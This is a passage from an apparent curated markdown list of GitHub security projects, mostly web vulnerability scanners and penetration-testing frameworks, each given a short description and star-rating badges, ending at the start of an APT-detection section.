> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/BkScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/BkScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/BkScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/BkScanner?style=flat-square)
- https://github.com/ysrc/GourdScanV2 - **Passive vulnerability scanning system**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ysrc/GourdScanV2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ysrc/GourdScanV2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ysrc/GourdScanV2?style=flat-square) ![GitHub](https://img.shields.io/github/license/ysrc/GourdScanV2?style=flat-square)
- https://github.com/netxfly/passive_scan - **Realization of web vulnerability scanner based on http proxy**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/netxfly/passive_scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/netxfly/passive_scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/netxfly/passive_scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/netxfly/passive_scan?style=flat-square)
- https://github.com/1N3/Sn1per - **Automated pentest recon scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/Sn1per?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/Sn1per?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/Sn1per?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/Sn1per?style=flat-square)
- https://github.com/RASSec/pentestEr_Fully-automatic-scanner - **Directional fully automated penetration testing**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square)
- https://github.com/Xyntax/POC-T - **Penetration test plug-in concurrency framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/POC-T?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/POC-T?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/POC-T?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/POC-T?style=flat-square)
- https://github.com/v3n0m-Scanner/V3n0M-Scanner - **Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other vulns**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/v3n0m-Scanner/V3n0M-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/v3n0m-Scanner/V3n0M-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/v3n0m-Scanner/V3n0M-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/v3n0m-Scanner/V3n0M-Scanner?style=flat-square)
- https://github.com/Skycrab/leakScan - **Multiple vuls scan supports web interface**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Skycrab/leakScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Skycrab/leakScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Skycrab/leakScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/Skycrab/leakScan?style=flat-square)
- https://github.com/zhangzhenfeng/AnyScan - **A automated penetration testing framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zhangzhenfeng/AnyScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zhangzhenfeng/AnyScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zhangzhenfeng/AnyScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/zhangzhenfeng/AnyScan?style=flat-square)
- https://github.com/Tuhinshubhra/RED_HAWK - **An all In one tool For information gathering, SQL vulnerability scanning and crawling, coded In PHP**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tuhinshubhra/RED_HAWK?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tuhinshubhra/RED_HAWK?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tuhinshubhra/RED_HAWK?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tuhinshubhra/RED_HAWK?style=flat-square)
- https://github.com/swisskyrepo/DamnWebScanner - **Another web vulnerabilities scanner, this extension works on Chrome and Opera**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/swisskyrepo/DamnWebScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/swisskyrepo/DamnWebScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/swisskyrepo/DamnWebScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/swisskyrepo/DamnWebScanner?style=flat-square)
- https://github.com/anilbaranyelken/tulpar - **Web Vulnerability Scanner written in Python,supported multiple web vulnerabilities scan**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/anilbaranyelken/tulpar?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/anilbaranyelken/tulpar?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/anilbaranyelken/tulpar?style=flat-square) ![GitHub](https://img.shields.io/github/license/anilbaranyelken/tulpar?style=flat-square)
- https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest - **An automated penetration testing tool this tool will auditing all standard security test method for you**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square) ![GitHub](https://img.shields.io/github/license/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square)
- https://github.com/0xsauby/yasuo - **ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xsauby/yasuo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xsauby/yasuo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xsauby/yasuo?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xsauby/yasuo?style=flat-square)
- https://github.com/hatRiot/clusterd - **application server attack toolkit**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hatRiot/clusterd?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hatRiot/clusterd?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hatRiot/clusterd?style=flat-square) ![GitHub](https://img.shields.io/github/license/hatRiot/clusterd?style=flat-square)
- https://github.com/erevus-cn/pocscan - **Open source and distributed web vulnerability scanning framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/erevus-cn/pocscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/erevus-cn/pocscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/erevus-cn/pocscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/erevus-cn/pocscan?style=flat-square)
- https://github.com/TophantTechnology/osprey - **Distributed web vulnerability scanning framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TophantTechnology/osprey?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TophantTechnology/osprey?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TophantTechnology/osprey?style=flat-square) ![GitHub](https://img.shields.io/github/license/TophantTechnology/osprey?style=flat-square)
- https://github.com/yangbh/Hammer - **A web vulnerability scanner framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/yangbh/Hammer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/yangbh/Hammer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/yangbh/Hammer?style=flat-square) ![GitHub](https://img.shields.io/github/license/yangbh/Hammer?style=flat-square)
- https://github.com/Lucifer1993/AngelSword - **Web vulnerability scanner framework based on python3**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Lucifer1993/AngelSword?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Lucifer1993/AngelSword?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Lucifer1993/AngelSword?style=flat-square) ![GitHub](https://img.shields.io/github/license/Lucifer1993/AngelSword?style=flat-square)
- https://github.com/zaproxy/zaproxy - **One of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zaproxy/zaproxy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zaproxy/zaproxy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zaproxy/zaproxy?style=flat-square) ![GitHub](https://img.shields.io/github/license/zaproxy/zaproxy?style=flat-square)
- https://github.com/s0md3v/Striker - **Striker is an offensive information and vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Striker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Striker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Striker?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Striker?style=flat-square)
- https://github.com/dermotblair/webvulscan - **Written in PHP and can be used to test remote, or local, web applications for security vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dermotblair/webvulscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dermotblair/webvulscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dermotblair/webvulscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/dermotblair/webvulscan?style=flat-square)
>
- https://github.com/alienwithin/OWASP-mth3l3m3nt-framework - **Penetration testing aiding tool and exploitation framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square)
- https://github.com/toyakula/luna - **An open-source web security scanner which is based on reduced-code passive scanning framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/toyakula/luna?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/toyakula/luna?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/toyakula/luna?style=flat-square) ![GitHub](https://img.shields.io/github/license/toyakula/luna?style=flat-square)
- https://github.com/Manisso/fsociety - **A Penetration Testing Framework including Information Gathering,Wireless Testing,Web Hacking and so on**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Manisso/fsociety?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Manisso/fsociety?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Manisso/fsociety?style=flat-square) ![GitHub](https://img.shields.io/github/license/Manisso/fsociety?style=flat-square)
- https://github.com/boy-hack/w9scan - **A web vulnerability scanner framework,running with 1200+ plugins**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/w9scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/w9scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/w9scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/w9scan?style=flat-square)
- https://github.com/YalcinYolalan/WSSAT - **Web service security assessment tool,provide simple .exe application to use based on Windows OS**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-CSharp-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/YalcinYolalan/WSSAT?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/YalcinYolalan/WSSAT?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/YalcinYolalan/WSSAT?style=flat-square) ![GitHub](https://img.shields.io/github/license/YalcinYolalan/WSSAT?style=flat-square)
- https://github.com/AmyangXYZ/AssassinGo - **An extenisble and concurrency pentest framework in Go**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/AmyangXYZ/AssassinGo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/AmyangXYZ/AssassinGo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/AmyangXYZ/AssassinGo?style=flat-square) ![GitHub](https://img.shields.io/github/license/AmyangXYZ/AssassinGo?style=flat-square)
- https://github.com/joker25000/Optiva-Framework - **Web Application Scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/joker25000/Optiva-Framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/joker25000/Optiva-Framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/joker25000/Optiva-Framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/joker25000/Optiva-Framework?style=flat-square)
- https://github.com/theInfectedDrake/TIDoS-Framework - **The offensive web application penetration testing framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/theInfectedDrake/TIDoS-Framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/theInfectedDrake/TIDoS-Framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/theInfectedDrake/TIDoS-Framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/theInfectedDrake/TIDoS-Framework?style=flat-square)
- https://github.com/TideSec/WDScanner - **A full-featured vulnerability scanner for enterprise security**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/WDScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/WDScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/WDScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/WDScanner?style=flat-square)
- https://github.com/j3ssie/Osmedeus - **Fully automated offensive security tool for reconnaissance and vulnerability scanning**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/j3ssie/Osmedeus?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/j3ssie/Osmedeus?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/j3ssie/Osmedeus?style=flat-square) ![GitHub](https://img.shields.io/github/license/j3ssie/Osmedeus?style=flat-square)
- https://github.com/jeffzh3ng/Fuxi-Scanner - **Open source network security vulnerability scanner with asset discovery & management**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jeffzh3ng/Fuxi-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jeffzh3ng/Fuxi-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jeffzh3ng/Fuxi-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/jeffzh3ng/Fuxi-Scanner?style=flat-square)
- https://github.com/knownsec/Pocsuite - **Open-sourced remote vulnerability testing framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/knownsec/Pocsuite?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/knownsec/Pocsuite?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/knownsec/Pocsuite?style=flat-square) ![GitHub](https://img.shields.io/github/license/knownsec/Pocsuite?style=flat-square)
- https://github.com/opensec-cn/kunpeng - **An open source POC framework written by Golang that provides various language calls in the form of a dynamic link library**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/opensec-cn/kunpeng?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/opensec-cn/kunpeng?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/opensec-cn/kunpeng?style=flat-square) ![GitHub](https://img.shields.io/github/license/opensec-cn/kunpeng?style=flat-square)
- https://github.com/jaeles-project/jaeles - **The Swiss Army knife for automated Web Application Testing**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jaeles-project/jaeles?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jaeles-project/jaeles?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jaeles-project/jaeles?style=flat-square) ![GitHub](https://img.shields.io/github/license/jaeles-project/jaeles?style=flat-square)
- https://github.com/TideSec/Mars - **The totally new generation of WDScanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/Mars?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/Mars?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/Mars?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/Mars?style=flat-square)
- https://github.com/knassar702/scant3r - **Yet another web security scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/knassar702/scant3r?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/knassar702/scant3r?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/knassar702/scant3r?style=flat-square) ![GitHub](https://img.shields.io/github/license/knassar702/scant3r?style=flat-square)
- https://github.com/google/tsunami-security-scanner - **A general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidenc by Google**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/google/tsunami-security-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/google/tsunami-security-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/google/tsunami-security-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/google/tsunami-security-scanner?style=flat-square)
- https://github.com/er10yi/MagiCude - **A scanner based on the Spring Boot micro-service,supports distributed port (vulnerability) scanning, asset security management, real-time threat monitoring and notification, vulnerability lifecycle, vulnerability wiki, email notification, etc**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/er10yi/MagiCude?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/er10yi/MagiCude?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/er10yi/MagiCude?style=flat-square) ![GitHub](https://img.shields.io/github/license/er10yi/MagiCude?style=flat-square)
- https://github.com/projectdiscovery/nuclei - **A fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/projectdiscovery/nuclei?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/projectdiscovery/nuclei?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/projectdiscovery/nuclei?style=flat-square) ![GitHub](https://img.shields.io/github/license/projectdiscovery/nuclei?style=flat-square)
- https://github.com/ysrc/xunfeng - **Vulnerability rapid response,scanning system for intranet**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ysrc/xunfeng?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ysrc/xunfeng?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ysrc/xunfeng?style=flat-square) ![GitHub](https://img.shields.io/github/license/ysrc/xunfeng?style=flat-square)
- https://github.com/TophantTechnology/ARL - **An agile asset reconnaissance system**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TophantTechnology/ARL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TophantTechnology/ARL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TophantTechnology/ARL?style=flat-square) ![GitHub](https://img.shields.io/github/license/TophantTechnology/ARL?style=flat-square)
- https://github.com/smallcham/sec-admin - **SEC can be used for enterprises to scan and check the security of server resources which has strong controllability, supports distributed multi-node deployment**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/smallcham/sec-admin?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/smallcham/sec-admin?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/smallcham/sec-admin?style=flat-square) ![GitHub](https://img.shields.io/github/license/smallcham/sec-admin?style=flat-square)
- https://github.com/olacabs/jackhammer - **One Security vulnerability assessment/management tool to solve all the security team problems**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/olacabs/jackhammer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/olacabs/jackhammer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/olacabs/jackhammer?style=flat-square) ![GitHub](https://img.shields.io/github/license/olacabs/jackhammer?style=flat-square)
- https://github.com/bigblackhat/oFx - **Vulnerability verification framework, corporate assets analysis and rapid scanner for 1day vulnerability**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/bigblackhat/oFx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/bigblackhat/oFx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/bigblackhat/oFx?style=flat-square) ![GitHub](https://img.shields.io/github/license/bigblackhat/oFx?style=flat-square)
### Advanced Persistent Threat Detect
- https://github.com/Neo23x0/Loki - **Simple IOC and Incident Response Scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Neo23x0/Loki?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Neo23x0/Loki?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Neo23x0/Loki?style=flat-square) ![GitHub](https://img.shields.io/github/license/Neo23x0/Loki?style=flat-square)
- https://github.com/Neo23x0/Fenrir - **Simple IOC and Incident Response Scanner**
